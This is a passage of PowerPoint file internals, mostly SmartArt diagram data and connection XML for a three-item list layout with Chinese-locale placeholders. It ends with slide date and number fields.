    <dgm:cxn modelId="{73BED5AE-1546-4D15-8E21-BC6DEA00286D}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4D826D9C-4ED4-4C8D-B43B-BCA95B696B8F}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1C9B6DA7-5CDF-4FF6-8CEA-72D1D9C602A8}" type="presOf" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{94E12545-92A8-48B4-B421-988AEF9D8529}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DA803D68-5758-4DD7-8288-23AF32940505}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" srcOrd="0" destOrd="0" parTransId="{6BA6FF2F-6AA5-4261-B65C-9AF88B07768D}" sibTransId="{9F0DE1A6-C81C-480D-8C4E-69BAF347FE65}"/>
    <dgm:cxn modelId="{EA6E8D85-71E8-45C2-9A78-5C9FDAF17BED}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5626710A-E7D8-44E0-8124-B56B29AE3EFB}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4B70B80E-DAAD-402D-AEC9-16408F05D836}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D0C9079B-9546-40DA-8D54-D072014AC95B}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{73FC940E-908A-45B1-B16E-C1F68ABDD44D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{54D61241-9AD7-4A93-BB3C-58F9A4E65A15}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0C537529-28E1-4250-8B8C-8C41271CAB59}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1D283212-8A91-48F2-AD0D-C77F09A387AA}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{12803518-A4AE-43B5-8560-164AC8E0641A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{73D5F3D5-BBF9-468B-9BA1-A4EFE0A27363}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{5EBC383A-49FD-4EBB-908C-50739354D112}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2D895E8D-DD01-434F-91A6-9E2A6E378C09}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7CF255A1-A130-4E4A-B913-29CAFA438F16}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DA3F2124-9147-49D9-989C-F8E626A04DB6}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{3A5A72C8-48CB-4D24-91E0-508E89871516}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8BBC1DE2-3DD0-4681-9D08-F188D7C01AD3}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{90181CFE-3A5B-4E2E-9D46-AECB806452A9}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DD8A3B60-FC15-43A1-8271-090648714B2F}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{DA0F52B0-D9D2-4D15-992D-B50CA07CB3BE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BDE79038-29EA-4462-8EC9-569D714A7DA7}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{97CE8490-B327-41EE-A090-4A7CDE3A753E}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A13EF617-B218-47D7-AF4E-758745582FC3}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7686355D-E53A-4D43-949F-E979B0BB83CA}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0D1B92F9-519F-43BA-928F-3DEDB2FB8F52}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6199A556-72E6-4A48-A1D6-516140FF5888}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{16B4579D-1246-4739-8C04-6FDF6966F1B2}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data9.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <dgm:ptLst>
    <dgm:pt modelId="{A9228B0A-2475-44DB-B72B-DD65F47D100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1E406E7-751F-41D5-9A1B-8D772397DA43}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm: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6BA6FF2F-6AA5-4261-B65C-9AF88B07768D}" type="parTrans" cxnId="{DA803D68-5758-4DD7-8288-23AF32940505}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F0DE1A6-C81C-480D-8C4E-69BAF347FE65}" type="sibTrans" cxnId="{DA803D68-5758-4DD7-8288-23AF32940505}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm: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721A16BF-2FDE-4873-B629-EDA500EB3C94}" type="parTrans" cxnId="{22361627-8F35-4217-8FCB-B63AE0FC9D3C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDE5D969-837E-4BFD-B9DA-743101DA5C48}" type="sibTrans" cxnId="{22361627-8F35-4217-8FCB-B63AE0FC9D3C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm: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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5563476-1867-403A-A2CC-59E00721D4ED}" type="sibTrans" cxnId="{7663ACF1-67FC-40D9-9CB9-AB237ACB520D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B59DEF11-F438-4F1C-B855-CF52866E622C}" type="parTrans" cxnId="{7663ACF1-67FC-40D9-9CB9-AB237ACB520D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94E12545-92A8-48B4-B421-988AEF9D8529}" type="pres">
      <dgm:prSet presAssocID="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" type="pres">
      <dgm:prSet presAssocID="{91E406E7-751F-41D5-9A1B-8D772397DA43}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BE26352-B55B-493D-92FC-C844801B329C}" type="pres">
      <dgm:prSet presAssocID="{91E406E7-751F-41D5-9A1B-8D772397DA43}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" type="pres">
      <dgm:prSet presAssocID="{91E406E7-751F-41D5-9A1B-8D772397DA43}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73FC940E-908A-45B1-B16E-C1F68ABDD44D}" type="pres">
      <dgm:prSet presAssocID="{91E406E7-751F-41D5-9A1B-8D772397DA43}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C537529-28E1-4250-8B8C-8C41271CAB59}" type="pres">
      <dgm:prSet presAssocID="{91E406E7-751F-41D5-9A1B-8D772397DA43}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12803518-A4AE-43B5-8560-164AC8E0641A}" type="pres">
      <dgm:prSet presAssocID="{9F0DE1A6-C81C-480D-8C4E-69BAF347FE65}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EBC383A-49FD-4EBB-908C-50739354D112}" type="pres">
      <dgm:prSet presAssocID="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" type="pres">
      <dgm:prSet presAssocID="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" type="pres">
      <dgm:prSet presAssocID="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A5A72C8-48CB-4D24-91E0-508E89871516}" type="pres">
      <dgm:prSet presAssocID="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90181CFE-3A5B-4E2E-9D46-AECB806452A9}" type="pres">
      <dgm:prSet presAssocID="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA0F52B0-D9D2-4D15-992D-B50CA07CB3BE}" type="pres">
      <dgm:prSet presAssocID="{CDE5D969-837E-4BFD-B9DA-743101DA5C48}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" type="pres">
      <dgm:prSet presAssocID="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" type="pres">
      <dgm:prSet presAssocID="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" type="pres">
      <dgm:prSet presAssocID="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D1B92F9-519F-43BA-928F-3DEDB2FB8F52}" type="pres">
      <dgm:prSet presAssocID="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{16B4579D-1246-4739-8C04-6FDF6966F1B2}" type="pres">
      <dgm:prSet presAssocID="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C869F5FB-E8D6-48A7-BC95-F8B1988A76DF}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0A901B61-805A-4CAF-9118-A2007B1B049E}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9F5E97CC-8FE4-4B9F-B4B2-5B26B20E5B04}" type="presOf" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{94E12545-92A8-48B4-B421-988AEF9D8529}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{28EF2598-FEE1-4CE6-B116-A9DDEE3F2912}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{22361627-8F35-4217-8FCB-B63AE0FC9D3C}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" srcOrd="1" destOrd="0" parTransId="{721A16BF-2FDE-4873-B629-EDA500EB3C94}" sibTransId="{CDE5D969-837E-4BFD-B9DA-743101DA5C48}"/>
    <dgm:cxn modelId="{7663ACF1-67FC-40D9-9CB9-AB237ACB520D}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" srcOrd="2" destOrd="0" parTransId="{B59DEF11-F438-4F1C-B855-CF52866E622C}" sibTransId="{D5563476-1867-403A-A2CC-59E00721D4ED}"/>
    <dgm:cxn modelId="{DA803D68-5758-4DD7-8288-23AF32940505}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" srcOrd="0" destOrd="0" parTransId="{6BA6FF2F-6AA5-4261-B65C-9AF88B07768D}" sibTransId="{9F0DE1A6-C81C-480D-8C4E-69BAF347FE65}"/>
    <dgm:cxn modelId="{7F5773CA-1252-4801-BFDF-0A752C01C6FB}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C452024F-8E4F-4DFE-917C-C5D3E7E031B2}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{91426BAF-52B5-4612-BB10-465A6D4D268C}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B723412-1EB8-4F6C-BACF-260912C31E36}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8CC4562F-C57D-43C7-92F3-69954882AA66}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C25F07A5-B380-4465-9A54-F81CB7EEC59A}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{15206940-A11E-4842-A47C-FADE0392EEF9}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{73FC940E-908A-45B1-B16E-C1F68ABDD44D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E7B5FCF2-F466-4B57-92AC-352B1878A99E}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0C537529-28E1-4250-8B8C-8C41271CAB59}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{58BDCA93-CFF7-43BF-91D8-E41952DDE3C2}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{12803518-A4AE-43B5-8560-164AC8E0641A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AEFC2B91-C816-4F09-A0E6-B36EEDA8532E}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{5EBC383A-49FD-4EBB-908C-50739354D112}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DD8D9034-E6BE-4AFF-9BF0-666C42BC7C09}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{18A7FEFF-4B35-46FD-9B42-9C46072B879E}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{755EB506-7C9A-41E6-AF87-5C8F7FEC9D2B}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{3A5A72C8-48CB-4D24-91E0-508E89871516}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B721646F-4739-4F71-9D2F-07BD6C2CCEE5}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{90181CFE-3A5B-4E2E-9D46-AECB806452A9}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3453131A-8FCF-4F68-A816-C7BC63837E73}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{DA0F52B0-D9D2-4D15-992D-B50CA07CB3BE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{08476F6D-270E-4460-BA11-060F2356A074}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2B770D0D-41C3-475D-BBC7-59D36AC8B26A}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{69D10C4F-DACE-4993-89BB-67E3E083053F}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EB3E2FBD-422D-49EF-A112-B049B9856290}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0D1B92F9-519F-43BA-928F-3DEDB2FB8F52}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5CF3BB36-6067-4C64-BF5E-170F90A15252}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{16B4579D-1246-4739-8C04-6FDF6966F1B2}" srcOrd="1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02A7663F-CD94-46D9-A042-3EF7ADE06815}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16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A562FBEC-4436-49DA-9F98-439B88D660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C937110B-E02E-41CE-B178-4859D12DD2CA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16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5D14782C-61C9-4488-81B7-E7934BDEBDC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BCCA613-32FE-4343-8882-21433836710E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>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2476813-31E4-493B-9214-180CCCA83FDC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
